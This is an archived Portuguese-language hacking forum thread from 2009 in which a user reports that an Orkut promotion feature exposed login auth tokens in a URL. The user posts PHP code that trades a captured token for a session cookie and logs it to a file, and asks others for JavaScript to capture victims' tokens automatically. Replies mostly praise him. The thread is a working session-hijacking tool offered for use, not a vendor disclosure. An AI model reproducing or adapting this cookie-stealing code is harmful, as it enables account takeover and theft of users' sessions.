Text only | Text with Images

FORUM DARKERS

Segurança & Hacking => Bugs | Exploits | Vulnerabilidades => Topic started by: Saad on 02 de December , 2009, 02:33:09 AM

Title: [ Vul ] Orkut, URL contendo os cookies.
Post by: Saad on 02 de December , 2009, 02:33:09 AM
Bom fussando aqui no orkut na função nova o promova, vi que que na URL contem o auth, no caso os cookies.

URL: http://promote.orkut.com/preview?nt=orkut.com&tt=Darkers&du=Darkers (http://promote.orkut.com/preview?nt=orkut.com&tt=Darkers&du=Darkers)

Quando vc acessar a URL, sera redirecionado para pagina do promova onde contem o auth:

http://promote.orkut.com/oauth_callback/12073179689912925797?pli=1&auth= (http://promote.orkut.com/oauth_callback/12073179689912925797?pli=1&auth=)

Para logar com o auth é simples, http://www.orkut.com/RedirLogin.aspx?auth= (http://www.orkut.com/RedirLogin.aspx?auth=) é so colocar o auth aqui, porem ele expira muito rapido então podemos transformar ele no cookie usando esse codigo

Code Select
<?
$auth = $_GET[auth];

function curl($url, $header, $nobody, $cookie, $str) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, $header);
curl_setopt($ch, CURLOPT_NOBODY, $nobody);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
$cod = curl_exec($ch); curl_close($ch);
if ($str !== 0) { $cod = explode($str, $cod); }
return $cod;
}
$cookie = curl("http://www.orkut.com/RedirLogin.aspx?auth={$auth}", 1, 1, 0, "Set-Cookie:");
$cookie = $cookie[1];
$fp = fopen("log.txt","a");
fwrite($fp, "$cookie
");
fclose($fp);
?>

tentei fazer um js para capturar o auth e transformar em cookies mas não consegui, o firefox ta bloqueando o Location.href se alguem conseguir posta ae (:
Title: Re: [ Vul ] Orkut, URL contendo os cookies.
Post by: Reeves on 02 de December , 2009, 07:47:12 AM
Muito bom SAAD, esse é o espirito!!!
depois vou dar uma olhada nisso com mais tempo e ver em que posso lhe ajudar

Seja bem-vindo ao Darkers

vlw ;)
Title: Re: [ Vul ] Orkut, URL contendo os cookies.
Post by: n4n0t3rr0r on 02 de December , 2009, 10:33:14 PM
isso ae sad :}
Title: Re:[ Vul ] Orkut, URL contendo os cookies.
Post by: Binsh# on 30 de December , 2009, 03:11:36 PM
bah.... interessanticimo... e inedito... mas q cagada esse orkut...

cookies são o pesadelo de sitesinho lixo de relacionamento a abse de JS


muito bom SAAD
Title: Re:[ Vul ] Orkut, URL contendo os cookies.
Post by: ptnapivoski on 30 de December , 2009, 07:52:20 PM
Saad...

Tu é o cara do convitesaqui?

Daquela enganação da colheita feliz?
Title: Re:[ Vul ] Orkut, URL contendo os cookies.
Post by: Binsh# on 02 de January , 2010, 09:01:14 AM
muito bom... se vc for o verdadeiro SAAD eu te admiro... espero q n seja + um com esse nick
Title: Re:[ Vul ] Orkut, URL contendo os cookies.
Post by: Nv0 on 20 de January , 2010, 08:33:42 PM
È ele mesmo.
Title: Re:[ Vul ] Orkut, URL contendo os cookies.
Post by: Joey on 21 de January , 2010, 01:02:43 AM
qm é esse saad? e oq ele fez?
Title: Re:[ Vul ] Orkut, URL contendo os cookies.
Post by: guioximitsu on 16 de March , 2010, 01:11:43 PM
Muito bom o tópico, obrigado por compartilhar com os demais do fórum  :)
Text only | Text with Images